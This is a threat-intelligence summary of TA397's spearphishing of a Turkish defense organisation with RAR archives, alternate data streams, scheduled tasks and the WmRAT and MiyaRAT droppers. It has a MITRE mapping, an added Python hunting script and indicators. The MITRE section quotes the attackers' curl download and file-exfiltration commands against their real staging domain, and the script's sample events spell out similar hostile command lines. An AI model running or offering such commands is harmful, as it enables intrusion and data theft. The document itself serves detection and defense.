Proofpoint observed TA397 spearphishing a Turkish defense-sector organization using RAR archives and NTFS alternate data streams to execute PowerShell and create a scheduled task that staged further payloads. The campaign manually delivered WmRAT and the newer MiyaRAT for intelligence collection and C2 communication. #TA397 #MiyaRAT
Keypoints
- TA397 sent a targeted spearphishing email with a RAR attachment containing a decoy PDF, a malicious LNK shortcut, and NTFS alternate data streams (ADS).
- The ADS named “Participation” contained base64 PowerShell which the LNK executed to open the PDF and create a scheduled task (“DsSvcCleanup”) that beaconed to a staging domain.
- Operators manually delivered two RAT families—WmRAT and MiyaRAT—via MSI droppers (anvrsa.msi, gfxview.msi) to enable remote access, enumeration, and exfiltration.
- Staging and C2 infrastructure included jacknwoods[.]com (staging) and academymusica[.]com / samsnewlooker[.]com (C2), with observed IPs 185.244.151[.]84, 38.180.142[.]228, and 96.9.215[.]155.
- Techniques (RAR archives, ADS, scheduled tasks, manual operator activity) and operational patterns (UTC+5:30 working hours) link the activity to TA397/Bitter and likely intelligence collection for a South Asian government.
- Proofpoint provides YARA/ET signatures and IOCs to help defenders detect and mitigate similar campaigns leveraging ADS and scheduled tasks for persistence.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – used to deliver a RAR with a decoy PDF and malicious shortcut (‘RAR archive containing a decoy PDF and a malicious LNK file’).
- [T1053.005] Scheduled Task/Job – attacker-created scheduled task named “DsSvcCleanup” to periodically fetch next-stage payloads (‘set up a scheduled task named “DsSvcCleanup”’).
- [T1059.001] PowerShell – ADS contained base64-encoded PowerShell which was executed to open the decoy PDF and create the scheduled task (‘base64 encoded PowerShell from “Participation”’).
- [T1564.001] Hidden Files and Directories (NTFS ADS) – NTFS alternate data streams were used to hide the PowerShell payload inside the PDF file stream (‘Alternate Data Stream (ADS) file that contained PowerShell code’).
- [T1105] Ingress Tool Transfer – curl was used by the scheduled task and in operator-issued commands to download MSI droppers and payloads (‘curl -o C:\users\public\music\gfxview[.]msi http://jacknwoods[.]com/gfxview[.]msi’).
- [T1071.001] Application Layer Protocol: Web Protocols – HTTP GET/POST to web endpoints used for beacons and exfiltration (‘GET http[:]//jacknwoods[.]com/jacds[.]php?jin=%computername%_%username%’ and POST to ‘/chthuo[.]php’).
- [T1041] Exfiltration Over C2 Channel – attacker commands enumerated host data and exfiltrated it via HTTP POST to attacker-controlled endpoints (‘curl -X POST -F “file=[@]C:\programdata\abc[.]pdf” hxxps[:]//www[.]jacknwoods[.]com/chthuo[.]php’).
- [T1218] Signed Binary Proxy Execution – msiexec was used to install MSI droppers that deployed the RATs (‘msiexec /i C:\users\public\music\gfxview.msi /qn /norestart’).
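The keypoints and the MITRE mapping above describe one execution chain: a shortcut launches PowerShell that reads its payload out of an NTFS alternate data stream, a scheduled task periodically pulls the next stage with curl, curl posts collected files back, and msiexec quietly installs droppers from a user-writable directory. The following is an added hunting example, written for this summary and not code from Proofpoint or from the report; it scores Sysmon-style process-creation events (flattened here to a constructed `parent|image|commandline` format) against those four behaviours. All sample events, hostnames (`EXAMPLE-STAGING.invalid`) and file names in the block are constructed and are not indicators from the report.

```python
"""Behavioural hunting rules for the TA397 chain summarised above:
PowerShell reading an NTFS alternate data stream, a scheduled task whose
action fetches a remote payload, curl used for download or multipart
upload, and a quiet msiexec install from a user-writable directory.

Sample events are constructed for this example and are not report telemetry.
"""
import re
from typing import List, Tuple

# Constructed process-creation events: parent image | image | command line.
SAMPLE_EVENTS = [
    # LNK double-click: explorer.exe spawns PowerShell that reads the ADS
    r'C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|'
    r'powershell.exe -w hidden -c "iex (Get-Content ~tmp.pdf -Stream Participation)"',
    # scheduled task whose action downloads a next-stage payload
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\schtasks.exe|'
    r'schtasks /create /sc minute /mo 17 /tn DsSvcCleanup /tr "cmd /c curl -o '
    r'C:\users\public\music\a.msi http://EXAMPLE-STAGING.invalid/a.msi"',
    # the task firing: curl writes into a world-writable directory
    r'C:\Windows\System32\cmd.exe|C:\Windows\System32\curl.exe|'
    r'curl -o C:\users\public\music\a.msi http://EXAMPLE-STAGING.invalid/a.msi',
    # operator exfiltrating a collected file via multipart POST
    r'C:\Windows\System32\cmd.exe|C:\Windows\System32\curl.exe|'
    r'curl -X POST -F "file=@C:\programdata\abc.pdf" https://EXAMPLE-STAGING.invalid/up.php',
    # quiet MSI install from the staging directory
    r'C:\Windows\System32\cmd.exe|C:\Windows\System32\msiexec.exe|'
    r'msiexec /i C:\users\public\music\a.msi /qn /norestart',
    # benign: user opens a PDF normally
    r'C:\Windows\explorer.exe|C:\Program Files\Adobe\Acrobat\Acrobat.exe|'
    r'"C:\Program Files\Adobe\Acrobat\Acrobat.exe" C:\Users\jdoe\Documents\report.pdf',
]

# file.ext:streamname -- the cmd.exe/explorer syntax for an alternate data stream
ADS_RE = re.compile(r"[\w~\-]+\.\w{1,5}:[A-Za-z][\w.]*")
URL_RE = re.compile(r"https?://", re.I)
DOWNLOADERS = ("curl", "powershell", "bitsadmin", "certutil")
PUBLIC_DIRS = ("\\users\\public\\", "\\programdata\\", "\\appdata\\local\\temp\\")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(parent: str, image: str, cmd: str) -> List[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    img, low, hits = _basename(image), cmd.lower(), []
    # 1. PowerShell pulling its script body out of an ADS, by either syntax
    if img == "powershell.exe" and (ADS_RE.search(cmd) or "-stream" in low):
        hits.append("powershell_reads_ads")
    # 2. a new scheduled task whose action runs a downloader against a URL
    if (img == "schtasks.exe" and "/create" in low and URL_RE.search(cmd)
            and any(tool in low for tool in DOWNLOADERS)):
        hits.append("schtask_fetches_remote_payload")
    # 3. curl writing into a world-writable directory, or uploading a file
    if img == "curl.exe":
        if " -o " in low and any(d in low for d in PUBLIC_DIRS):
            hits.append("curl_download_to_public_dir")
        if re.search(r'-f\s+"?file=@', low):
            hits.append("curl_file_upload")
    # 4. silent msiexec install of a package staged in a user-writable path
    if (img == "msiexec.exe" and "/i" in low and "/qn" in low
            and any(d in low for d in PUBLIC_DIRS)):
        hits.append("quiet_msiexec_from_public_dir")
    return hits


def detect(events: List[str]) -> List[Tuple[str, str]]:
    """Run every rule over flattened events; yields (rule, command line) pairs."""
    findings = []
    for line in events:
        parent, image, cmd = line.split("|", 2)
        for rule in evaluate(parent, image, cmd):
            findings.append((rule, cmd))
    return findings


if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {cmd}")
```

Each rule keys on the behaviour rather than on the report's domains or hashes, so a renamed task or a new staging host still trips it; the IOC list below is the complement, not a substitute. The ADS rule accepts both the `file:stream` path form and PowerShell's `-Stream` parameter, because either reaches the same hidden content.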
Indicators of Compromise
- [SHA256] RAR / payload samples – 53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1, f6c77098906f5634789d7fd7ff294bfd95325d69f1be96be1ee49ff161e07733 (RAR and LNK samples; additional WmRAT/MiyaRAT hashes listed in report).
- [SHA256] Malware binaries – 10cec5a84943f9b0c635640fad93fd2a2469cc46aae5e43a4604c903d139970f (WmRAT), c7ab300df27ad41f8d9e52e2d732f95479f4212a3c3d62dbf0511b37b3e81317 (MiyaRAT).
- [Domain] Staging and C2 domains – jacknwoods[.]com (staging used to host MSI droppers), academymusica[.]com and samsnewlooker[.]com (C2 domains for WmRAT and MiyaRAT respectively).
- [IP] Observed IPs – 185.244.151[.]84 (jacknwoods[.]com staging), 38.180.142[.]228 (academymusica[.]com C2), 96.9.215[.]155 (samsnewlooker[.]com C2).
- [File names] Droppers / executables – anvrsa.msi (installs anvrsa.exe / WmRAT), gfxview.msi (drops xrgtg.exe / MiyaRAT); decoy files: ~tmp.pdf, PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk.
- [URLs/Paths] Beacon and exfil endpoints – /jacds.php?jin=… (initial beacon), /chthuo.php?ain=… (exfil POST) on jacknwoods[.]com.